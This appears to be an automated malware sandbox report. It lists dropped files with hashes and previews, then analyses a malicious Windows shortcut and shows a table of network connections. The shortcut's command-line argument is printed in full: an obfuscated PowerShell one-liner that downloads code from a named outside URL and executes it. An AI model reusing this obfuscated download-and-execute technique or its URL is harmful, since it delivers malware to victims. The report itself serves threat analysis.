                                                                Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):15114
                                                                Entropy (8bit):5.355210274232325
                                                                Encrypted:false
                                                                SSDEEP:384:PrZaBXjr47m8LQpuaB5myQsdxGfv3znFbLjlvT1NPVDVS7R0fzho6BJcJcxBO5gL:SIfVn
                                                                MD5:4EEC36C3BAA0B7607596DC4A53E4B92A
                                                                SHA1:01C5582D02F32F1F21150D209D69BDF340C804E4
                                                                SHA-256:35DAAE99E63A0DAD2DC124D56C425329EFE569DEB8DDAC99B2C9ED63A11F462C
                                                                SHA-512:DA560D0968BBB54D4972A1BB53A3FF9C1C6D41C39D5E7032A3EBC15C29BA30D92DF98409D2836C699BEAF53647AE1015689CF1A4708ACF6622C963A4DA707052
                                                                Malicious:false
                                                                Preview:SessionID=a4b82114-c9a3-4885-96ff-4dee48707e29.1734605788414 Timestamp=2024-12-19T05:56:28:414-0500 ThreadID=7180 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=a4b82114-c9a3-4885-96ff-4dee48707e29.1734605788414 Timestamp=2024-12-19T05:56:28:415-0500 ThreadID=7180 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=a4b82114-c9a3-4885-96ff-4dee48707e29.1734605788414 Timestamp=2024-12-19T05:56:28:415-0500 ThreadID=7180 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=a4b82114-c9a3-4885-96ff-4dee48707e29.1734605788414 Timestamp=2024-12-19T05:56:28:415-0500 ThreadID=7180 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=a4b82114-c9a3-4885-96ff-4dee48707e29.1734605788414 Timestamp=2024-12-19T05:56:28:415-0500 ThreadID=7180 Component=ngl-lib_NglAppLib Description="SetConf
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):29752
                                                                Entropy (8bit):5.416902160744286
                                                                Encrypted:false
                                                                SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cba0KK2Rmz4ZdMV0bEV0Gl0t8icbAX:ceo4+rsCLwh
                                                                MD5:40C0A2CA1590C06D56B129E736806B11
                                                                SHA1:4BDBA6A6D31E7F5A2BD30B51F72F789A2118198B
                                                                SHA-256:F125F253E4B450CEC327501D780C4D1B59BF05B1244D5E5FA0DBC28A2990E600
                                                                SHA-512:FB01F51F004FED3986637BD0F4DAA7D4A802E037DB58940734C51A07232A0E561B1A3AD03CD9CF69501D239B2352E32EFB9FD656D633B5D5A448119F3E403EC2
                                                                Malicious:false
                                                                Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                Category:dropped
                                                                Size (bytes):1419751
                                                                Entropy (8bit):7.976496077007677
                                                                Encrypted:false
                                                                SSDEEP:24576:/xwYIGNP4meWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:ZwZG6XWLxXGZN3mlind9i4ufFXpAXkru
                                                                MD5:8120D0F6C3E7FE6C6AA6836461A3979A
                                                                SHA1:D02DCEA0B32809957CA61A414DD1DE0960F2DFA5
                                                                SHA-256:846EA50561F8FB5BC02AEA4CAC1F096341029280BF67CC41C2F0DF76E4739AD5
                                                                SHA-512:2BD571AF0B100E797F30349D6DC43C8B1C9C1D21B54D11A431E492751D57BD86AC69E9A671BEC0E3645CE2430DA4B423C71A966FD953B6D99D9A1463358FF4C4
                                                                Malicious:false
                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                                Category:dropped
                                                                Size (bytes):1407294
                                                                Entropy (8bit):7.97605879016224
                                                                Encrypted:false
                                                                SSDEEP:24576:/VRbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZnYIGNPJF:tRb3mlind9i4ufFXpAXkrfUs0qWLxXGY
                                                                MD5:9543A6C1DE815E938F6AA0F90F2EF0C6
                                                                SHA1:62B527E0463D71548862DE000950E638F3721582
                                                                SHA-256:8A4B4F588D79D2AF9E617936932D8264DF9017D80A68F8D39E5EA36B14D76F1D
                                                                SHA-512:50A26B895BA1F40B2ADE59996A1A89EBAFE67CB9F7B4F3A029382B6966E75F8BAD3551D25F29391C58A7EDC206F7DAF1D07F68F5E458E3A5D02556EACA377B0D
                                                                Malicious:false
                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                Category:dropped
                                                                Size (bytes):758601
                                                                Entropy (8bit):7.98639316555857
                                                                Encrypted:false
                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                MD5:3A49135134665364308390AC398006F1
                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                Malicious:false
                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                Category:dropped
                                                                Size (bytes):386528
                                                                Entropy (8bit):7.9736851559892425
                                                                Encrypted:false
                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                Malicious:false
                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4511
                                                                Entropy (8bit):3.793939972343306
                                                                Encrypted:false
                                                                SSDEEP:48:ezJ2lzTURNTxl1qSogZo+lMf0RNTxleqSogZo+lMz1:eUzgNTx7HTMUNTxSHTMZ
                                                                MD5:AA9D3100100ED652B17139CD40F09C63
                                                                SHA1:0C6CB8B4BB9511F3CCB50BE4B3783F560C7ADEBF
                                                                SHA-256:5B16DB1243E9164B21D5294C35462FC1A6ED22B06B74273DC0BD512D78EDDA64
                                                                SHA-512:67CB88B855BC24B407E2242320166631C207F7EF24D6EE4967D7FA32909B4A815DD63E46132D66EA19EC38CC4F8C5CDA6072C7DAFB02CBE8174B7A79B3D478D5
                                                                Malicious:false
                                                                Preview:...................................FL..................F. .. ...~.!.g....!...R..WE^..R...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd....!.g....!...R....j.2......Y.W .FJFZ7U~1.LNK..N......EW.D.Y.W.....$.......................F.j.f.Z.7.u.M.8.z.h...l.n.k.......U...............-.......T.............Gv.....C:\Users\user\Desktop\FjfZ7uM8zh.lnk....i.m.a.g.e.r.e.s...d.l.l.`.......X.......701188...........hT..CrF.f4... ..D..Yc...,...E...hT..CrF.f4... ..D..Yc...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....U$..f....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.D..Windows.@......OwH.Y.W....3.........................W.i.n.d.o.w.s.....Z.1......Y.W..System32..B......OwH.Y.W..........................7.<.S.y.s.t.e.m.3.2.....t.1......O.I..Wi
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4511
                                                                Entropy (8bit):3.793939972343306
                                                                Encrypted:false
                                                                SSDEEP:48:ezJ2lzTURNTxl1qSogZo+lMf0RNTxleqSogZo+lMz1:eUzgNTx7HTMUNTxSHTMZ
                                                                MD5:AA9D3100100ED652B17139CD40F09C63
                                                                SHA1:0C6CB8B4BB9511F3CCB50BE4B3783F560C7ADEBF
                                                                SHA-256:5B16DB1243E9164B21D5294C35462FC1A6ED22B06B74273DC0BD512D78EDDA64
                                                                SHA-512:67CB88B855BC24B407E2242320166631C207F7EF24D6EE4967D7FA32909B4A815DD63E46132D66EA19EC38CC4F8C5CDA6072C7DAFB02CBE8174B7A79B3D478D5
                                                                Malicious:false
                                                                Preview:...................................FL..................F. .. ...~.!.g....!...R..WE^..R...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd....!.g....!...R....j.2......Y.W .FJFZ7U~1.LNK..N......EW.D.Y.W.....$.......................F.j.f.Z.7.u.M.8.z.h...l.n.k.......U...............-.......T.............Gv.....C:\Users\user\Desktop\FjfZ7uM8zh.lnk....i.m.a.g.e.r.e.s...d.l.l.`.......X.......701188...........hT..CrF.f4... ..D..Yc...,...E...hT..CrF.f4... ..D..Yc...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....U$..f....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.D..Windows.@......OwH.Y.W....3.........................W.i.n.d.o.w.s.....Z.1......Y.W..System32..B......OwH.Y.W..........................7.<.S.y.s.t.e.m.3.2.....t.1......O.I..Wi
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                Category:dropped
                                                                Size (bytes):871324
                                                                Entropy (8bit):7.827941732382635
                                                                Encrypted:false
                                                                SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                Malicious:false
                                                                Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):55
                                                                Entropy (8bit):4.306461250274409
                                                                Encrypted:false
                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                Malicious:false
                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=260, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                Entropy (8bit):3.6597348691715483
                                                                TrID:
                                                                • Windows Shortcut (20020/1) 100.00%
                                                                File name:FjfZ7uM8zh.lnk
                                                                File size:1'776 bytes
                                                                MD5:86f583992054521437321921a00e48c6
                                                                SHA1:36500c391de6bf1131e27de43f7bb9d96bd27d2c
                                                                SHA256:59d532293086dd82eeede4bd5f35902c8836b26d012891db2ee9f5b2056e76bb
                                                                SHA512:cfe93e755907960968f9b1fb3ffea870d651858b7f2126417417c2a8d86365d1ab012926c2d67310bb24fa4652862d598c6030674d9b9afb6d41e94779ece8c9
                                                                SSDEEP:24:8+pHYVKVW7/CWffpNVlp/GWOx/Gwx/GwQHkVCilfEI7hk7Z5w:8wazT/Bm/H/sri5ec
                                                                TLSH:D231358016629714E5FBAE35D4EB7212A87E6949DBB38FCA004241CD67B1111F039F2F
                                                                File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........windows.@.............................................w.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                Icon Hash:009280889081ad0d

                                                                General

                                                                Relative Path:..\..\..\..\windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Command Line Argument:${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing'))
                                                                Icon location:imageres.dll
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 19, 2024 11:56:19.104135036 CET49705443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:19.104176998 CET44349705107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:19.104258060 CET49705443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:19.116734982 CET49705443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:19.116759062 CET44349705107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:20.374780893 CET44349705107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:20.375017881 CET49705443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:20.381187916 CET49705443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:20.381197929 CET44349705107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:20.381540060 CET44349705107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:20.394243002 CET49705443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:20.435336113 CET44349705107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:20.812952042 CET44349705107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:20.813038111 CET44349705107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:20.813163042 CET49705443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:20.835812092 CET49705443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:22.461990118 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:22.462114096 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:22.462222099 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:22.462583065 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:22.462618113 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:23.715194941 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:23.715295076 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:23.719383955 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:23.719397068 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:23.719660997 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:23.721086025 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:23.763341904 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.159879923 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.214257956 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.279779911 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.279793978 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.279810905 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.279819012 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.279850960 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.279855013 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.279906034 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.279941082 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.279941082 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.279973984 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.394835949 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.394861937 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.394982100 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.394982100 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.395026922 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.395107031 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.435501099 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.435527086 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.435596943 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.435667992 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.435707092 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.438934088 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.561000109 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.561067104 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.561117887 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.561137915 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.561167002 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.561189890 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.587604046 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.587626934 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.587743044 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.587753057 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.587804079 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.614090919 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.614110947 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.614188910 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.614197969 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.614242077 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.640264988 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.640288115 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.640356064 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.640367031 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.640400887 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.640423059 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.751025915 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.751055002 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.751241922 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.751264095 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.751307964 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.769553900 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.769625902 CET44349706107.161.23.150192.168.2.8
